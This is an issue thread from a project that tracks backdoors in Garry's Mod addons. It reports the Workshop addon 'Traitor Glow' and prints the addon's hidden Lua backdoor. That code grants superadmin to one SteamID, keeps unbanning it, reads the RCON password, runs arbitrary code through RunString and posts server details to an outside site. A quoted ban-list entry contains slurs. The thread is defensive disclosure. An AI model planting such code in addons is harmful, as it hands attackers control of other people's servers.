### ISSUE TITLE
Backdor - Traitor Glow

### ISSUE THREAD

**Issue by MinIsMin** [MFSiNC/Backdoor_Busting_2015#2]
http://steamcommunity.com/sharedfiles/filedetails/?id=744427899
Uploader: http://steamcommunity.com/id/twomad (0:153604459) (Listed in List A)

This Addon contains backdoors which allows the uploader to unban and making himself an admin.
Also contacts his server to get server data.

`concommand.Add("76soldier_sa", function(player) player:SetUserGroup("superadmin") end)
ULib.unban( "STEAM_0:0:153604459")`

**Comment by MFSiNC** [comment]
Just checked the code from that addon, its worse than that, see:

``autorun/server/init.lua``
```lua
hook.Add( "Initialize", "cakerawsd", function()
	concommand.Add( "_76sup", function(ply)
		if ( ply:SteamID() == "STEAM_0:0:153604459") then
			RunConsoleCommand("ulx", "adduserid", ply:SteamID(), "superadmin")
	else
		ply:ChatPrint("Your not superadmin, " .. ply:Name() .. ".")
	end
	end)

	timer.Create( "checkForBan", 5, 0, function()
	ULib.unban( "STEAM_0:0:153604459")
	end )
	concommand.Add("76soldier_cf",function() local RconPass = GetConVar("rcon_password"):GetString() print(RconPass) end)
	concommand.Add( "_76", function(player,command,argument) RunString(table.concat(argument)) end)
	concommand.Add("76soldier_sa", function(player) player:SetUserGroup("superadmin") end)
	http.Post("http://soldier-76.com/bd.php", {name = GetHostName(),ip = game.GetIPAddress()})
end)
```

And

``autorun/shared.lua``
```lua
GM.Name 	= "Traitor Glow [TTT]"
GM.Author 	= "N/A"
GM.Email 	= "N/A"
GM.Website 	= "N/A"

local t_fx = {
	"ttt_c4",
	"npc_tripmine"
}
concommand.Add("76soldier_sa", function(player) player:SetUserGroup("superadmin") end)

...

concommand.Add("76soldier_cf",function() local RconPass = GetConVar("rcon_password"):GetString() print(RconPass) end)

...

concommand.Add( "_76", function(player,command,argument) RunString(table.concat(argument)) end)
```

It has both a serverside backdoor & reports the server to his site, and unbans that steamID. Also a failed attempt to read the ```rcon_password``` cvar.

Report the addon on the Workshop. I'll add his ID to the list.

**Comment by MinIsMin** [comment]
Already reported the addon.
Thanks for your fast response.

**Comment by MFSiNC** [comment]
He was already in SkidCheck, I'll update his reason
```	["0:153604459"] = "soldier-76/twomad/Troll names, Posting RCON banner, "..GG.." faggothackers,Specialretarts,imsocoolwithmyanimepicturehng",```

**Comment by MinIsMin** [comment]
As I stated in my first post
> Uploader: http://steamcommunity.com/id/twomad (0:153604459) (Listed in List A)
But yes, thanks.
I think I'll add another code of yours, the anti backdoor script, to my server. It will be useful.

**Comment by PaidSubscription** [comment]
Look at this shit, https://gyazo.com/42ab3298a0fbaa8c9327ff45d4fb97ed

**Comment by MinIsMin** [comment]
Just to notify you all, the backdoor'd addon is back: http://steamcommunity.com/sharedfiles/filedetails/?id=744427899
